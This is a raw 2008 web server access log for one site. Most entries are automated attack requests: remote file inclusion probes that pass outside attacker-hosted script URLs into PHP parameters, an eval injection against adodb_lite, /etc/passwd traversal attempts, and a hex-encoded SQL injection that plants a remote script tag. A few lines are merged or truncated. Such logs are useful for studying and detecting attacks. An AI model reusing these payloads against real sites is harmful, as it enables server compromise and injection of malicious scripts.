70.84.236.242 - - [18/Aug/2008:09:05:23 -0700] "GET /logs/access_080226.log/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://hosting.501hosting.com/~mainhack/RL/rule/mod.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.236.242 - - [18/Aug/2008:09:05:23 -0700] "GET /components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://hosting.501hosting.com/~mainhack/RL/rule/mod.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.236.242 - - [18/Aug/2008:09:05:23 -0700] "GET /logs/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://hosting.501hosting.com/~mainhack/RL/rule/mod.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.172.182.209 - - [18/Aug/2008:09:05:27 -0700] "GET /logs/access_080605.log/!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.182.209 - - [18/Aug/2008:09:05:36 -0700] "GET /logs/access_080626.log/!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.182.209 - - [18/Aug/2008:09:05:37 -0700] "GET /logs/access_080213.log/!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.182.209 - - [18/Aug/2008:09:05:37 -0700] "GET /!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.182.209 - - [18/Aug/2008:09:05:38 -0700] "GET /logs/!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.182.209 - - [18/Aug/2008:09:05:57 -0700] "GET /!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.65.79 - - [18/Aug/2008:09:05:57 -0700] "GET /!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.64.51.36 - - [18/Aug/2008:09:06:06 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.militaria.com/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.51.36 - - [18/Aug/2008:09:06:06 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.militaria.com/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.113.253.128 - - [18/Aug/2008:09:06:32 -0700] "GET /logs/access_080724.log//include/bbs.lib.inc.php?site_path=http://www.mcsautomoveis.com/teste/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.113.253.128 - - [18/Aug/2008:09:06:32 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.mcsautomoveis.com/teste/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.113.253.128 - - [18/Aug/2008:09:06:32 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.mcsautomoveis.com/teste/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
151.11.24.250 - - [18/Aug/2008:09:06:42 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [18/Aug/2008:09:06:43 -0700] "GET /lostpasswd.php?env[include_prefix]=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:06:47 -0700] "GET /logs//sohoadmin/includes/login.php?_SESSION[docroot_path]=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:06:47 -0700] "GET //sohoadmin/includes/login.php?_SESSION[docroot_path]=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.172.140.17 - - [18/Aug/2008:09:07:16 -0700] "GET /index.php?url=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 200 11016 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:07:27 -0700] "GET /logs/access_080209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:07:27 -0700] "GET /logs/access_080209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:07:27 -0700] "GET /logs/access_080209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:07:31 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:07:31 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:07:31 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
82.194.67.123 - - [18/Aug/2008:09:07:38 -0700] "GET /index.php?url=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 200 11016 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:09:07:40 -0700] "GET /logs/access_080806.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:09:07:41 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:09:07:41 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.80.157.162 - - [18/Aug/2008:09:07:45 -0700] "GET /bikes/dteel/2008_08_17/IMG_4447plack.JPG HTTP/1.1" 200 228191 "http://www.st-owners.com/forums/showthread.php?t=42795&page=8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
64.80.157.162 - - [18/Aug/2008:09:07:47 -0700] "GET /bikes/dteel/2008_08_17/IMG_5163s.JPG HTTP/1.1" 200 325776 "http://www.st-owners.com/forums/showthread.php?t=42795&page=8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
64.80.157.162 - - [18/Aug/2008:09:07:47 -0700] "GET /bikes/dteel/2008_08_17/IMG_4445tag.JPG HTTP/1.1" 200 311123 "http://www.st-owners.com/forums/showthread.php?t=42795&page=8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:09:07:50 -0700] "GET /logs/access_080806.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:09:07:51 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:09:07:51 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.18.151.242 - - [18/Aug/2008:09:07:59 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://www.acoc.co.kr/acoc/board/icon/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "dmulk.com"
67.18.151.242 - - [18/Aug/2008:09:07:59 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.acoc.co.kr/acoc/board/icon/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "dmulk.com"
67.18.151.242 - - [18/Aug/2008:09:07:59 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.acoc.co.kr/acoc/board/icon/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "dmulk.com"
212.227.65.79 - - [18/Aug/2008:09:08:09 -0700] "GET /logs/access_080808.log/!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.18.151.242 - - [18/Aug/2008:09:08:12 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.acoc.co.kr/acoc/board/icon/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [18/Aug/2008:09:08:12 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.acoc.co.kr/acoc/board/icon/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [18/Aug/2008:09:08:13 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.acoc.co.kr/acoc/board/icon/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [18/Aug/2008:09:08:13 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://www.acoc.co.kr/acoc/board/icon/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "dmulk.com"
67.18.151.242 - - [18/Aug/2008:09:08:13 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.acoc.co.kr/acoc/board/icon/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "dmulk.com"
67.18.151.242 - - [18/Aug/2008:09:08:13 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.acoc.co.kr/acoc/board/icon/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "dmulk.com"
69.94.70.15 - - [18/Aug/2008:09:08:13 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.227.65.79 - - [18/Aug/2008:09:08:20 -0700] "GET /logs/!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [18/Aug/2008:09:08:20 -0700] "GET /!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
151.11.24.250 - - [18/Aug/2008:09:08:22 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://albforum.freehostia.com/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [18/Aug/2008:09:08:22 -0700] "GET /lostpasswd.php?env[include_prefix]=http://albforum.freehostia.com/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.151.242 - - [18/Aug/2008:09:08:24 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.acoc.co.kr/acoc/board/icon/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:09:08:26 -0700] "GET /logs/access_080730.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.18.151.242 - - [18/Aug/2008:09:08:28 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.acoc.co.kr/acoc/board/icon/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [18/Aug/2008:09:08:28 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.acoc.co.kr/acoc/board/icon/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:09:08:38 -0700] "GET /logs/access_080730.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
151.11.24.250 - - [18/Aug/2008:09:08:45 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://albforum.freehostia.com/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [18/Aug/2008:09:08:46 -0700] "GET /lostpasswd.php?env[include_prefix]=http://albforum.freehostia.com/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.164.83.227 - - [18/Aug/2008:09:08:52 -0700] "GET /logs/access_080312.log?';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B4043carou6/us1:99.225.233.1581.164.83.227 - - [18/Aug/2008:09:08:55 -0700] "GET /logs/access_080312.log?;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432yuriquintana/us1:71.235.217.172.182.209 - - [18/Aug/2008:09:09:07 -0700] "GET /logs/!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.182.209 - - [18/Aug/2008:09:09:08 -0700] "GET /!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.73.82.13 - - [18/Aug/2008:09:09:09 -0700] "GET /logs/errors.php?error=http://albforum.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.73.82.13 - - [18/Aug/2008:09:09:10 -0700] "GET /errors.php?error=http://albforum.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:09:10 -0700] "GET /logs//sohoadmin/program/modules/mods_full/includes/login.php?_SESSION[docroot_path]=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [18/Aug/2008:09:09:10 -0700] "GET //sohoadmin/program/modules/mods_full/includes/login.php?_SESSION[docroot_path]=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:09:16 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.172.182.209 - - [18/Aug/2008:09:09:46 -0700] "GET /logs/access_080808.log/!scanhttp://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.75.31 - - [18/Aug/2008:09:09:47 -0700] "GET /logs//?path%5Bdocroot%5D=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 200 61146 "-" "libwww-perl/5.810" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:09:09:47 -0700] "GET /logs/access_080227.log//?path%5Bdocroot%5D=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:09:09:48 -0700] "GET //?path%5Bdocroot%5D=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 200 10984 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.75.31 - - [18/Aug/2008:09:09:49 -0700] "GET //?path%5Bdocroot%5D=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 200 11000 "-" "libwww-perl/5.810" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:09:09:49 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 200 61146 "-" "libwww-perl/5.803" "www.dmulk.com"
81.164.83.227 - - [18/Aug/2008:09:09:49 -0700] "GET /logs/access_080309.log?';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B4043emtgibson/us4:86.144.1.181.164.83.227 - - [18/Aug/2008:09:09:49 -0700] "GET /logs/access_080309.log?;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432gbhpreschool/us1:72.206.151.1.140.201 - - [18/Aug/2008:09:09:53 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
151.1.140.201 - - [18/Aug/2008:09:09:53 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:09:09:56 -0700] "GET /logs/access_080717.log//?path%5Bdocroot%5D=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:09:10:20 -0700] "GET /logs/access_080227.log//?path%5Bdocroot%5D=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:09:10:22 -0700] "GET //?path%5Bdocroot%5D=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 200 11000 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:09:10:22 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 200 61146 "-" "libwww-perl/5.803" "www.dmulk.com"
91.84.19.133 - - [18/Aug/2008:09:10:29 -0700] "GET /logs/access_080118.log/index.php?url=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.84.19.133 - - [18/Aug/2008:09:10:30 -0700] "GET /index.php?url=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 200 11016 "-" "libwww-perl/5.79" "www.dmulk.com"
91.84.19.133 - - [18/Aug/2008:09:10:31 -0700] "GET /logs/index.php?url=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.130 - - [18/Aug/2008:09:10:32 -0700] "GET /logs/access_080717.log//?path%5Bdocroot%5D=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.129.97.30 - - [18/Aug/2008:09:10:37 -0700] "GET /logs/access_080614.log/index.phpmain.php?x=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.129.97.30 - - [18/Aug/2008:09:10:37 -0700] "GET /logs/index.phpmain.php?x=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.129.97.30 - - [18/Aug/2008:09:10:38 -0700] "GET /index.phpmain.php?x=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 7978 "-" "libwww-perl/5.808" "www.dmulk.com"
89.129.97.30 - - [18/Aug/2008:09:10:38 -0700] "GET /logs/access_080522.log/index.phpmain.php?x=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.105.33.158 - - [18/Aug/2008:09:10:55 -0700] "GET /logs/access_080806.log/index.php?fn=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
